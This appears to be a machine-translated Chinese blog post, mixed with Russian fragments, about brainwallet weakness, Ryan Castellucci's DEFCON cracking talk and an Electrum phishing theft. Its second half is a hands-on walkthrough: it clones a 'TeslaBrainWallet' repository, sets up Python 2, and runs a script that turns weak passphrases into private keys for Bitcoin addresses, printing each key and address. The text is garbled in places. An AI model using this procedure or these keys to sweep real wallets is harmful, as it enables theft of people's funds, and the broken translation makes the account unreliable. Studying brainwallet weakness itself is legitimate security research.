創建比特幣錢包有多種形式。創建比特幣錢包的第一種方法被稱為 BrainWallet。BrainWallet 方便是因為它允許您將 “密碼”存儲在內存中或筆記本中。密碼短語使用算法進行散列處理 SHA-256,並用作生成 私鑰的種子。
由於它們的流行和易用性,
BrainWallet過去幾年中許多都使用了弱密碼。
這種弱私鑰生成方法允許攻擊者通過簡單地根據存儲在區塊鏈上的哈希值破解密碼來竊取大量硬幣 BTC。儘管此攻擊已為人所知多年,但 由於Ryan Castellucciв 2015 году 所做的工作而 廣為人知
2015 年 8 月 7 日
Ryan Castellucci 在 DEFCON23上談到 破解 BrainWallet密碼。儘管 BrainWallet 此時密碼短語已使用多年,但對話有助於將這些問題帶給更廣泛的公眾。
文件 [ PDF]: 破解加密貨幣腦錢包 Ryan Castellucci
BrainWalletRyan結合名為BrainFlayerProven Cryptocurrency Wallet Cracker 的工具BrainWallet和其他低熵算法發布了他在黑客方面的工作成果 。
GPU 加速
目前, пробный cracker Ryan 的 brainflayer 已升級為各種軟件、實用程序、腳本 等,但仍創建了 圖形加速器 以 支持GPUBrainWallet 運行時 。這些加速器被稱為 TeslaBrainWallet,以NVIDIA® Tesla® V100計算系統 系列命名 。
網絡釣魚
許多比特幣擁護者經常引用 BrainWallet 作為保護資金免遭沒收的好方法,但不幸的是 Bitcoin клиента Electrum,.
雖然
Electrum它支持所有流行的硬件錢包 (例如Trezor,Ledger等) 最多可以安裝第三方插件來擴展錢包的功能,但是如果你安裝舊版本的比特幣錢包,你可能會冒著失去所有的風險錢包中的加密貨幣硬幣。
這個陷阱是通俗的下詞 "фишинг"。加密社區有很多悲傷的故事。金額最大的網絡釣魚損失之一 1400 BTC (16 миллионов долларов США)
根據加密行業門戶網站 “CryptoPotato”
一位匿名的比特幣投資者
«1400BitcoinStolen»周日聲稱,他1400 BTC在“愚蠢地”安裝了流行錢包的舊版本後 輸了錢Electrum,但後來發現這是 一個網絡釣魚騙局。陷阱:
在解釋這起不愉快的事件時,受害人說他無法使用這些資金
с 2017 года。在設置錢包並嘗試轉賬後,1 BTC他收到一條彈出消息,要求他在轉賬前更新安全系統。不幸的是,這是 一個陷阱 – 網絡釣魚企圖。據受害人稱,他 安裝了更新後,自己的所有資金都自動轉到了黑客的錢包地址,讓騙子更加富有на 16 миллионов долларов США。
如何避免成為網絡釣魚的受害者?
在我們早期的帖子中,我們強烈推薦給大家:
- 只使用經過驗證的軟件;
- 查看源代碼;
- 自己組裝;
- 進行更新;
弱密碼
讓我們繼續進行實驗部分:
讓我們使用“13TeslaBrainWallet”存儲庫 。
git clone https://github.com/demining/CryptoDeepTools.git
cd CryptoDeepTools/13TeslaBrainWallet/
ls
讓我們為 Python 2.7 安裝 pip2
(因為從2022年9月20日開始 Google Colab 不使用 "pip2" 默認的 "Python 2.7")
sudo apt install python2-minimal
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2 get-pip.py
安裝 ECDSA 密碼簽名庫
pip2 install ecdsa
運行 Python 腳本:teslaBTC.py
BTC 硬幣餘額為正的弱密碼短語的歷史
讓我們打開 bitaddress 並檢查:
python2 teslaBTC.py "arretonprimaryschool"
Pass phrase: arretonprimaryschool
Private key: 0e57a34ee4cf2242bc331494981aa896e803c598cc4a0f890b2e85d6acb85f29
Bitcoin address: 16jLdtAxgXVwcG93MyPcNALXMCv3D6dyDB
python2 teslaBTC.py "correct horse battery staple"
Pass phrase: correct horse battery staple
Private key: c4bbcb1fbec99d65bf59d85c8cb62ee2db963f0fe106f483d9afa73bd4e39a8a
Bitcoin address U: 1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T
Bitcoin address C: 1C7zdTfnkzmr13HfA2vNm5SJYRK6nEKyq8
python2 teslaBTC.py "This is the way the world ends."
Pass phrase: This is the way the world ends.
Private key: 1bad2815705c693b4df94badf0f757c601d841bff62c40f9546432034a4c29b7
Bitcoin address: 1DnqpnCFiXqMhvRfdRzPcRao7yxyoeXgjf
python2 teslaBTC.py "The quick brown fox jumps over the lazy dog"
Pass phrase: The quick brown fox jumps over the lazy dog
Private key: d7a8fbb307d7809469ca9abcb0082e4f8d5651e46d3cdb762d02d0bf37c9e592
Bitcoin address: 13w4Hn1BJQM4bjZZgYtXpyp4cioiw29tKj
python2 teslaBTC.py "just let the lovin take ahold"
Pass phrase: just let the lovin take ahold
Private key: 5e6fa5565782e85f3e305c422388e687e4fc8c2e7c572748f57ff7a4d6ff736a
Bitcoin address: 1H6nTPQ8wqdQ3QFrGc1qy9r63acpTAkwvc
python2 teslaBTC.py "en un lugar de la mancha"
Pass phrase: en un lugar de la mancha
Private key: e9f852cd97283461e254da265a27d2bda07f245cb5f8a6ee622355fcec63eb8c
Bitcoin address: 1Gwd5BQCDsFrEvokGkto945smazwEMKqdo
python2 teslaBTC.py "The quick brown fox jumped over the lazy dog."
Pass phrase: The quick brown fox jumped over the lazy dog.
Private key: 68b1282b91de2c054c36629cb8dd447f12f096d3e3c587978dc2248444633483
Bitcoin address: 1E2Wgex1ZGfZ9gb4MBubJJ5bnABkk2pbZf
python2 teslaBTC.py "Thats what she said 1974"
Pass phrase: Thats what she said 1974
Private key: 0e3630f0f829d93afd8569f7c50aaced3d930353db8468d8c42b58d7f5ce1fdb
Bitcoin address: 113W1qXf6DsJFtqMnR53tqvLrVfjkjR7g5
python2 teslaBTC.py "lorem ipsum dolor sit amet"
Pass phrase: lorem ipsum dolor sit amet
Private key: 2f8586076db2559d3e72a43c4ae8a1f5957abb23ca4a1f46e380dd640536eedb
Bitcoin address: 1KRGyNbq2yM1vAXscib74Snp6AUuUHVi2g
文學:
該視頻是為 CRYPTO DEEP TECH門戶網站創建的 ,以確保橢圓曲線上的數據和密碼學的金融安全性 免受 加密貨幣中 secp256k1 弱簽名的影響 ECDSABITCOIN
電報: https: //t.me/cryptodeeptech
視頻素材:https://youtu.be/r0fTtBDWTnw
資料來源: https ://cryptodeep.ru/tesla-brainwallet
